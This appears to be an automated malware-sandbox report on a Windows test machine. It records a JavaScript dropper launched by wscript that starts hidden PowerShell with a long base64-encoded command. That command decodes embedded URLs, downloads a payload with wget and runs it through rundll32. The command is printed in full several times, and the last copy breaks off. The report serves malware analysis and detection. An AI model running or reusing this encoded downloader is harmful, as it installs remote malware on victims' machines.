Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 12, 2023, 9:26 a.m. | May 12, 2023, 9:29 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness
1368-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"
2416
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdw